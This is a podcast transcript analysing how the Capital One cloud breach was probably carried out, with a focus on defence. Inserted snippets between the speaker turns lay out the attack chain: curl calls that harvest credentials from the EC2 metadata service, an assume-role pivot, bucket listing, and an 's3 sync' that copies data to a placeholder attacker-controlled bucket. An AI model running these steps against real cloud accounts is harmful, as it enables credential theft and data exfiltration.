Reverse Engineering the Capital One Breach with Josh Stella

Episode Summary

Cloud security makes Josh Stella tick. In 2013, he founded Fugue, a company that brings native security and simplified operations to cloud architecture. Join Corey and Josh as they discuss why Fugue is called Fugue, how the approach hackers take has changed in recent years, why cloud security is actually more of a physics and biology problem than a technology problem, the recent Capital One data breach, how it likely happened, why the bank didn’t necessarily do anything wrong, why cloud security should be automated, and more.

Episode Show Notes & Transcript

About Josh Stella
Josh Stella is co-founder and CTO of Fugue, the company delivering autonomous cloud infrastructure security and compliance. Previously, Josh was a Principal Solutions Architect at Amazon Web Services (AWS), where he supported customers in the area of national security. Prior to Fugue, Josh served as CTO for a technology startup and, for 25 years, in numerous other IT leadership and technical roles.

Transcript
Announcer: Hello and welcome to Screaming in the Cloud with your host, cloud economist Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.


Corey: This week’s episode of Screaming in the Cloud is sponsored by X-Team. X-Team is a 100% remote company that helps other remote companies scale their development teams. You can live anywhere you like and enjoy a life of freedom while working on first-class company environments. I gotta say, I’m pretty skeptical of “remote work” environments, so I got on the phone with these folks for about half an hour, and, let me level with you: I’ve gotta say I believe in what they’re doing and their story is compelling. If I didn’t believe that, I promise you I wouldn’t say it. If you would like to work for a company that doesn’t require that you live in San Francisco, take my advice and check out X-Team. They’re hiring both developers and devops engineers. Check them out at the letter x dash Team dot com slash cloud. That’s x-team.com/cloud to learn more. Thank you for sponsoring this ridiculous podcast.


Welcome to Screaming in the Cloud. I'm Corey Quinn. I'm joined this week by Josh Stella, founder and CTO of a company called Fugue. Josh, welcome to the show.


Josh: Thanks Corey. It's great to be here.


Corey: Let's start at the very beginning. What is a fugue? My awareness of the company starts and stops with a T-shirt I got at an event a couple of years back. It's glorious, people have general trouble reading it, it's very nice once you look at the abstract design and then eventually realize it says the word "fugue" in a very stylistic way.


Josh: There is a backstory there. A fugue is a compositional style in music, and in particular, fugues are constructed out of relatively simple musical phrases that evolve over time and interleave, and they have produced some of the most sophisticated, beautiful pieces of music ever written. What made me think of it for the company and the software we were writing was a book published in the 1980s that made an impression on me as a young person called Gödel, Escher, Bach: An Eternal Golden Braid by Douglas Hofstadter, which I highly recommend. It's about the nature of complex systems arising out of simple systems. And I wasn't quite sure it would be a good company name, but my colleagues, when I brought it up, kind of insisted, so Fugue we are.


Corey: Excellent, and Fugue you shall remain. At a high level what your company does to my understanding, and please correct me loudly and energetically if I'm wrong, but you focus on cloud governance specifically with an eye towards security and compliance.


Josh: Yes, that's true. I would say cloud governance focused primarily, as you said, on security and compliance. The way we do that is very different from how others are thinking about security. From Fugue's perspective, the cloud is itself software defined, which means that security is a software engineering problem, not a security analysis problem. We actually create a complete model of the entire application or system that's being run in the cloud, and then we can compute against that. We can compute things like: is it in compliance with certain compliance regimes like HIPAA or CIS or NIST? But we can also compute things like: has it changed over time? Has it mutated in dangerous ways from one moment to the next? That's the space we're in; our approach is a little different.


Corey: Understood. And security in the cloud is something that no one really pays attention to, and it's not particularly interesting, because nothing much ever really happens in that space. On a completely unrelated topic, as of the time of this recording, a couple of weeks back there was a Capital One breach that puts the lie to everything I just said. And you wrote a technical analysis of how that attack may have been pulled off that aligns almost perfectly with my own assessment of it. Can you take people through the high level of what happened and what you suspect occurred?


Josh: Absolutely, and I think the key word there is may. We only have a certain amount of data. Largely I focused on the DOJ complaint, because that's an official document. And I did look at the screenshots of the attacker's Twitter feed, although only after I tried to recreate the attacks. I'm gonna describe it from a technical perspective, and if you want me to, I can go back and describe it more in layman's terms; I think I've come up with a decent analogy for that. And this is a maybe. Some things we know about the attack from the DOJ complaint, to the degree that that's accurate, but it's not enough to really piece the whole picture together. I made some assumptions and I'll try to highlight those as I touch on them. And let me start by saying I have really good friends at both AWS and Capital One who are absolutely brilliant engineers, and I think both, as organizations, do a phenomenal job. This is stuff that can happen to just about anyone.


Corey: I would absolutely agree with that. In fact, taking a look at what we've seen so far, there's been a lot of noise around this that doesn't necessarily seem to bear itself out, and a lot of people, of course, because it's the internet, are speculating wildly and passing it off as fact.


Josh: Oh yes. Most of what I'm seeing out there, I think, misses the most important points. And I hope your listeners get some value out of this: as somebody who's worked in cloud security and integrity for years now, I think there are some important things to notice here that are largely getting ignored. My theory of the attack... the way I did this is I came up with a theory and then I recreated this attack in my own environment against my own infrastructure. Not production Fugue infrastructure (it actually would not have worked there), but against my own development environment. What we know from the DOJ complaint is there was a misconfigured firewall. We don't know what kind of firewall, we don't know what the misconfiguration was. And I think a lot of folks are conflating "misconfigured firewall" with the fact that an IAM role with WAF, which stands for web application firewall, was used. That may be true, but it also may not be true.


In my theory, there is another firewall, a traditional IP firewall, that has a bad port open. And we have heard from, I think, fairly credible sources that the attacker was scanning the internet for vulnerabilities. That's the first point I'd like to make: in the old days, attackers would target organizations specifically and go look for vulnerabilities. That still happens, but what's happening most of the time now is attackers have automated their search for vulnerabilities and then they pick targets from those who are vulnerable. In this case it was Capital One, but it could have been Josh's Auto Repair; they just found a gap. They found the back door open in a firewall and started working from there. That might've been a security group that had a bad port open, it could have been another kind of firewall, but it appears that the attacker got access to, most likely, an EC2 compute instance. And I say likely because there is a need to collect metadata off the metadata service and the hypervisor, and to assume IAM roles, and that's most likely EC2.
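To make that step concrete, here is a rough sketch of what reading credentials off a compromised instance can look like, using plain curl against the EC2 instance metadata service. None of these specifics come from the complaint, and the role name is invented.

    # On (or through) a compromised EC2 instance, the instance metadata service
    # hands out the attached role's temporary credentials to anything that can
    # reach 169.254.169.254, with no authentication required.
    curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
    # prints the attached role name, e.g. "app-server-role" (hypothetical)

    curl http://169.254.169.254/latest/meta-data/iam/security-credentials/app-server-role
    # returns JSON containing AccessKeyId, SecretAccessKey, and Token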


I think that the attacker got in the back door, looked around, found an exploitable EC2 instance, and then in her Twitter feed she says she used assume-role, and this is where things really get interesting. Assume-role means taking on a different IAM identity. You've got this server, and maybe it has an IAM identity that only allows it to do things like, oh I don't know, connect to a database. But once you're on that server, if that EC2 instance itself has IAM permissions to look at other IAM roles, you can go shopping for an identity that allows you to do more destructive things.
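In AWS CLI terms, the pivot Josh is describing is a single STS call. The account ID and role ARN below are placeholders, purely to illustrate the technique.

    # Using the credentials harvested from the instance, try to take on a more
    # privileged identity. The account ID and role name are made up.
    aws sts assume-role \
        --role-arn arn:aws:iam::123456789012:role/some-more-privileged-role \
        --role-session-name recon
    # On success, STS returns a fresh AccessKeyId, SecretAccessKey, and
    # SessionToken for the assumed role.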


Let's assume for a moment, because we know Capital One are really good at this stuff, that that server's native IAM role, the EC2 instance's assigned IAM role, didn't have permissions like listing S3 buckets, because that's a bad idea, right? You should know what S3 buckets you need to talk to, and listing them is like getting a phone directory to where the data safes are. But if you could get into that EC2 instance and shop for an IAM role that did have S3 list, and then assume that role, now you get a listing of those S3 buckets. I believe that was the next step.
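If that shopping trip succeeds, getting the phone directory is one more command. A minimal sketch, again with placeholder values rather than anything from the actual incident:

    # Export the assumed role's temporary credentials (values are placeholders),
    # then enumerate every bucket the role is allowed to see.
    export AWS_ACCESS_KEY_ID=AKIA...
    export AWS_SECRET_ACCESS_KEY=...
    export AWS_SESSION_TOKEN=...

    aws s3api list-buckets --query 'Buckets[].Name'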


And then those buckets were identified. In the DOJ complaint, they use some interesting and specific language. They say that there were four commands executed, and the fourth command they describe as a sync command. Now, S3's API does not have a sync API endpoint, but the AWS CLI has a utility function called sync for S3. I suspect what happened is the attacker got into EC2, looked at the metadata service's credentials, used those to escalate identity and permissions, listed S3 buckets, and then synced those S3 buckets to another collection of S3 buckets. And of course, that would not send a lot of network traffic. It actually wouldn't send any network traffic over a VPC for things like VPC flow logs to catch; it would all be S3 to S3 and largely invisible to traditional security tools. That's, in a nutshell, my theory of what happened.
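For context, the CLI utility Josh is referring to looks like this. Both bucket names are placeholders; this is a reconstruction of the general technique, not the actual commands from the case.

    # "sync" is a convenience command in the AWS CLI that walks a source bucket
    # and issues S3 copy requests against a destination bucket.
    aws s3 sync s3://victim-data-bucket s3://attacker-controlled-bucket
    # Because the copies happen from S3 to S3, the object data never crosses the
    # VPC's virtual network, so there is nothing for VPC Flow Logs to see.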


Corey: I would almost take it a potential step further and wonder if, once you wind up assuming a new role, you still wind up having credentials that are able to do that. There's no restriction that I'm aware of that will only permit that credential set to be used from a certain location. Running this from somewhere completely removed from Capital One's portion of the internet, from a host somewhere on the other side of the world, for example, would potentially have been able to do every bit as much of this without having full-on access to an instance inside the Capital One environment. Is that your understanding?


Josh: Yes and no. Generally true. However, let's again assume that Capital One are highly competent. We know they are. When you define S3 permissions, you can actually limit that to VPC CIDR blocks that you choose. And assuming that they limited it to certain VPC CIDR blocks, the commands would have had to have come from those CIDR blocks. But I think the point here is that that protection didn't help. Those S3 buckets that things were synced to could have been in another account and that account needed nothing to do with that IAM role, it just needed public S3 buckets to shove data into.
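The kind of restriction Josh describes is typically expressed as a bucket policy condition. A minimal sketch, with a hypothetical bucket name and an arbitrary address range; related condition keys such as aws:SourceVpc and aws:SourceVpce can similarly lock access to a specific VPC or VPC endpoint.

    # Hypothetical bucket policy: deny all S3 actions unless the request comes
    # from an approved address range. Bucket name and CIDR are placeholders.
    aws s3api put-bucket-policy --bucket example-data-bucket --policy '{
      "Version": "2012-10-17",
      "Statement": [{
        "Sid": "DenyOutsideApprovedRange",
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:*",
        "Resource": [
          "arn:aws:s3:::example-data-bucket",
          "arn:aws:s3:::example-data-bucket/*"
        ],
        "Condition": {
          "NotIpAddress": { "aws:SourceIp": "10.0.0.0/16" }
        }
      }]
    }'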


Corey: Everything you say is completely plausible; that's more or less where your article starts and stops. That said, though, from my perspective it feels like there are additional parts of the story. For example, 127 days elapsed between the time that this data was exfiltrated and the time that Capital One was made aware of it by an external security researcher. There was apparently no auditing going on for strange behaviors, such as listing 700 S3 buckets and then a massive transfer of the contents of sensitive buckets. Am I mistaken on something there?


Josh: I don't think you're mistaken, but one of the hardest problems in cloud security is finding signal in noise. Let's break this down: what might they have detected? A listing of S3 buckets? Yeah, you'd find that command in the logs and so on. But the sync command is doing an S3-to-S3 copy. Unlike a traditional data exfiltration, which would show up in a VPC flow log, or in the old world would be hitting the perimeter of your network, that doesn't hit any perimeters. That is just a command, and the data transfer happens behind the scenes, not in the virtualized network that you would be monitoring. So my educated instinct, let's say, is that this would be hard to detect. And given that she used both Tor and IPredator to cover her tracks, I strongly suspect the only reason she got caught and this got noticed is because she bragged about it.


Corey: And stored the exfiltrated data and tooling she used for this apparently in a GitHub account linked to her name.


Josh: Yeah. This feels like somebody who... I don't like to play psychologist, but somebody who wanted notoriety, and I think that was the undoing. She mentions that in the Twitter thread. But what that means is, if you are out there operating on the cloud and you're not very certain of how you have configured IAM and S3, and particularly IAM permissions to S3 on production instances, I suspect there are a lot of folks with this vulnerability. It's like the lateral-movement kind of attack that we've seen before, but the lateral movement is through identity on the cloud, because identity isn't just user identity, it's system component identity. And it almost forms a new kind of network. I think it's that complex and that big a problem. We're going to have to come up with security tools (and I'm biased in this because this is part of what we do) that consider IAM to be more like a network than just a set of usernames with authorizations.


Corey: One other area for intercepting this, even if it didn't stop the attack, would have been flagging it before someone else brought it to their attention. In a relatively well-managed environment with this level of sensitivity, given that they are in fact a bank, isn't it sensible to say that they should have had something alarm whenever an EC2 instance role called the assume-role API?
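As a rough illustration of what that kind of check involves (not a claim about what Capital One did or did not run), AssumeRole calls do land in CloudTrail and can be pulled out after the fact; the date range here is arbitrary.

    # Crude, after-the-fact query for AssumeRole events in CloudTrail. In
    # practice you would feed CloudTrail into CloudWatch Events or a SIEM and
    # alert when the caller is an EC2 instance role, rather than polling.
    aws cloudtrail lookup-events \
        --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
        --start-time 2019-03-01 --end-time 2019-03-31 \
        --max-results 50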


Josh: Well, sure. Doing that is easier said than done unless you have that complete picture of the infrastructure and you can detect all drift. That's why we take that approach. Otherwise you're tending to look through big, long logs of change and mutation and trying to pluck out from that what looks scary, and that's a really hard problem. Let's rewind for a sec and talk about the fundamental benefits of cloud. It's not a data center, it's a moving surface. It is less like a bank vault, more like an aircraft carrier. You're building something that is constantly in motion, and that means there's a flood of API calls going on all the time, every day, if you're using it effectively. And that's a blessing, because it allows us to build systems that scale automatically, that operate at high speed to compete with others in whatever your business is. I was talking to a customer the other day who does five to 10 production pushes a day.


That really wasn't like that in the old days. I think it comes down to: should things be caught? Yes. But what should be caught from that flood of information coming across the wire? The old approaches of looking for things that appear scary just fail. You have to have an understanding of what the known good state of that infrastructure is and the ability to catch any drift that occurs to that infrastructure, to elevate the actual changes above the normal functioning of the infrastructure so that you can put eyes on them. Or better yet, our belief is those things should be automatically healed. If the attackers are automated, the defense needs to be automated. That's a long-winded, wandering answer. I apologize for that.


Corey: No, no trouble at all. Ostensibly, isn't the value proposition of both Macie and GuardDuty, in different ways, to identify anomalous behavior, such as an EC2 instance that has always been a firewall until now and is suddenly listing S3 buckets and causing a whole bunch of object GETs?


Josh: Yeah, I can't really speculate as to whether they were using those services and something got lost in the noise or if they weren't using those services. I mean that's what those services try to do-


Corey: Yeah, they could be forgiven for not using Macie. They are a bank, but even a bank runs out of money sooner or later, and Macie is nowhere near affordable for any reasonable workload.


Josh: Yeah, fair. I think there are other approaches. But to go back to things like Macie and others: they're still trying to infer what matters. And I personally believe these systems can be made much more deterministic than that. You don't need fancy logic to pluck out the signal from the noise if you know what correct looks like. Things that deviate from correct are always suspicious unless they're handled through a proper CI/CD toolchain. And again, I'll say the cloud is actually a big software computer, it's not a data center. And therefore you can use software engineering approaches like infrastructure as code and policy as code. I think that's a much more successful way to deal with this kind of thing than trying to find needles in haystacks of data flying by.
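A toy sketch of that "know what correct looks like" idea, with made-up bucket names: declare the expected state, then flag anything that has drifted from it, instead of pattern-matching for scary-looking log lines.

    # Declared baseline (in a real system this would live in infrastructure-as-code
    # or policy-as-code, not in a shell variable). Bucket names are hypothetical.
    expected_buckets="app-data-bucket app-logs-bucket"

    actual_buckets=$(aws s3api list-buckets --query 'Buckets[].Name' --output text)

    for b in $actual_buckets; do
        case " $expected_buckets " in
            *" $b "*) ;;                              # matches the known good state
            *) echo "DRIFT: unexpected bucket $b" ;;  # anything else gets flagged
        esac
    done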


Corey: This week’s episode is sponsored by CHAOSSEARCH. If you’ve ever tried managing Elasticsearch yourself, you know that it is of the Devil. You have to manage a series of instances, you have to potentially deal with a managed service. What if all that went away? CHAOSSEARCH does that. It winds up taking the data that lives in your S3 buckets, indexing that, and providing an Elasticsearch-compatible API. You don’t have to manage infrastructure, you don’t have to play stupid slap-and-tickle games with various licensing arrangements; fundamentally, you wind up dealing with a better user experience for roughly 80% less than you’ll spend on managing actual Elasticsearch. CHAOSSEARCH is one of those rare companies where I don’t just advertise for them, I actively recommend them to my clients because, fundamentally, they’re hitting it out of the park. To learn more, look at CHAOSSEARCH.io. CHAOSSEARCH is of course all in capital letters because despite CHAOSSEARCHING they cannot find the caps lock key to turn it off. My thanks to CHAOSSEARCH for sponsoring this ridiculous podcast.


Corey: There is another position to take as far as blaming people goes, because whenever something like this happens, the first thing everyone wants to know is exactly whose fault it was and how irresponsible and terrible they were. I don't tend to give much credence to that. It's a natural human reaction, but punitive responses inspire people to hide things. There is an argument to be made, though, that the current state of cloud security is such that it's more than any one person can hold in their head as a full-time job, let alone the fact that most people are not security engineers.


They have a thing they're trying to do, and security is part and parcel of that, but it's not the core objective of what they're doing. Understanding all of the nuances of how all these things interplay feels like an awfully heavy lift. Maybe not as much for a bank, but given that we've seen this spate of cloud security issues, and Capital One is almost certainly not the only company out there susceptible to something like this, it really does make someone wonder: at what point do the providers themselves bear some level of responsibility for simplifying the stupefying complexity that is the security model?


Josh: Boy, you covered a lot of ground there. I'm going to go backwards. Why is it stupefyingly complex? It is stupefyingly complex because there are tons of features in the cloud. I remember back in the very early nineties, when I was a new Unix system administrator and I first got root access, I blew up my machine. I did. I got the arguments to a tar command backwards and I replaced the contents of the kernel file with an empty tape. Why could I do that? Should Sun Microsystems have prevented me from doing that? At the time I felt like it. But looking back, no. In fact, the beauty of these very rich and powerful systems is they allow humans to make lots of decisions and be clever. And with that comes risk. With that power comes risk. Will the cloud providers get better at showing people the sharp edges? I'm sure they will; they have over time. But I think this is a more fundamental problem than "the cloud providers should do better" or "cloud customers shouldn't make mistakes."


I think this is actually a physics and biology problem. Human beings typically can only remember about seven discrete pieces of data. This is why phone numbers sans area code in the US were seven digits long. The average person can remember seven things. We are bad at specificity, we are bad at detailed memory. And when you look at one of these cloud environments, let's say, one of our customers might have 50,000 or so cloud resources, a resource being something like an EC2 instance or an S3 bucket. And when you look at all the ways you can configure those, each resource can be configured in thousands, tens of thousands, maybe hundreds of thousands of ways. And multiply those together.


That is not the kind of problem humans are good at solving. It simply isn't. But we have these handy things called computers and this sixty-year-old practice called programming and software engineering that is very well suited to this problem. I think the blame lies with our collective failure of imagination: to understand that the cloud is actually a big general-purpose computer, that it needs to be programmed like one, and that it needs to be automated, not just in terms of its scaling functions and business functions, but in terms of its security functions. That might've been a little too geeky and down in the weeds. I'll take another shot at it if you like.


Corey: No, I think that's an absolutely fair assessment. With great power does come great responsibility, and I think that there's a responsibility to defend against sophisticated attacks like this. One thing that I've noticed across the internet in the wake of this has been, "Oh, she worked at Amazon back in 2016 on the S3 team, she must have used insider knowledge to pull this off." Well, you left Amazon. To my understanding, you used to be a Principal Solutions Architect there, and you left before 2016, and in 2017 they had their S3 apocalypse and then rebuilt the entire system from the ground up. Plus, you've laid out a very convincing and very plausible way this could have been exploited, and none of it required inside knowledge. It just required deep familiarity with the platform and publicly exposed utilities.


Josh: Yeah. I can't know for sure. Apparently she worked on the S3 team, but my instinct is that that is bullshit. If that's not okay to say, I'll do something else but-


Corey: No, please. We'll keep it.


Josh: Okay. I think it's bullshit. I recreated this, my theory of how this worked, in about five hours. I've been out of Amazon since 2013, and I used no insider information to recreate this. I looked at APIs. I thought about it for a minute, actually for a few minutes, maybe a few hours over the course of doing it, and pieced together a way to do this kind of attack. I think she was creative, and you know what? So are a lot of people; we should be worried about that. And this notion of an identity system: most people, when they hear identity, think about their Active Directory user when they log into their machine, and that's not what this is. This is the identity of components of the system, which can completely circumvent the traditional network boundaries, and that becomes a vector, again, for lateral movement. I don't think there was insider information used. I don't know, but none was needed.


Corey: Absolutely. This is the sort of sophisticated and clever attack that, for example, I would dream up. Maybe not to the same degree, and certainly not with the ethical lapse, but nothing about it required an inside-baseball perspective. Saying, "Oh, it's obviously a failure of how Amazon hires people, that someone who worked there many years ago now did something awful," doesn't hold up. Theoretically, if you were to go and turn evil and do something like this, I think there would be a whole hullabaloo made about the fact that once upon a time you worked there, so it must have been with inside knowledge that you did all of these things, and I just think that's crap.


Josh: I think so too. Look, people like things to have a bow on them. They like to have something to point at and blame. Human beings, in my experience, are very uncomfortable with the idea that we're facing issues that are truly complex, that require a lot of thought, creativity, and hard work to solve, and instead they look for some simple explanation. And I think that's one of a number of simple explanations I've heard. Actually doing something productive about this means really understanding what happened in an honest way. And I'm not claiming that my theory is perfectly correct, or even mostly correct. It's the best one I could come up with, but if nothing else, my theory and experiments have shown that this is a massive attack vector and people need a solution to it. I think it's pretty cheap to say, "Oh, this is an ex-AWSer." It could have been just about anyone.


Corey: It's also a bit insulting. Oh, no one could possibly understand AWS unless they worked there for years. Nonsense. Humans can understand anything. Nothing's impossible for a person to wrap their brain around. It just requires dedication and effort more than almost anything else.


Josh: Yeah, absolutely. I'll point back to the original use of the term hacker. It wasn't somebody who broke security walls down, it was somebody who did clever things in C or Lisp. People who are compelled to do creative things with computers get creative with computers. They use them in unintended ways and if you are a bad actor, this is what that looks like. If you're a good actor, you might make the next great application or secure an existing one or what have you. There's no easy answer to this.


Corey: And here's, I think, the most lingering question that we're faced with. Capital One may have their faults, but they don't hire stupid, and they care, and they pay attention to this because they know what's at stake. If they were in a position to fall victim to this, how many other companies are too?


Josh: Every company that's running a digital computer, whether it's in a data center or on the cloud. Capital One does hire excellent people. One of my best friends, and one of the most brilliant programmers I know, works there. We haven't spoken about this at all, by the way; we talk more about things like Rust and Haskell. I know the quality of their team. Asking people to be perfect is unreasonable, and I think the real question we have to be asking ourselves as an industry is: how do we become resilient? Because perfection is not an option.


Corey: Exactly. And it can't be M&M security where once you break through the hard outer candy shell, everything inside is soft. Defense in depth is critical.


Josh: I would even go beyond that. I completely agree, there is no perimeter. Forget about that. That's gone. It was never really there. Security is a collection of architectural decisions; it's not a technology you can layer on. And to get security right means understanding the system as a whole. I would argue for not just defense in depth, but defense at every level, all the way up and down the stack, where you're doing your best to eliminate these vulnerabilities. And pretty clearly in this case, once that firewall was penetrated and the IAM role assumption was possible, that was a pretty soft middle. But I think that we need to think about this in terms of every layer of the stack and baking in security as an architectural practice, and that is directly at odds, in many cases, with speed and efficiency. And again, I'm going to come back to this: computer science has pretty good answers for this problem, people just aren't thinking about it that way.


Corey: I think you may absolutely be onto something here and I'm beginning to understand why it is that you started a company aimed at solving these problems. If people care more about what you have to say and want to see your thoughts, where can they find you?


Josh: Our company is at Fugue, F-U-G-U-E, .co, dot C-O. I'm joshstella on Twitter and if you want to reach out to me, I'm [email protected].


Corey: Thank you much for taking the time to speak with me today. I appreciate it.


Josh: Thanks Corey. It's been fun to talk to you.


Corey: Likewise. If you've enjoyed this episode, please leave us a positive review on iTunes. If you hated this episode, please leave us a positive review on iTunes. I'm Corey Quinn. This is Screaming in the Cloud.


Announcer: This has been this week's episode of Screaming in the Cloud. You can also find more Corey at screaminginthecloud.com or wherever fine snark is sold.


Announcer: This has been a HumblePod production. Stay humble.

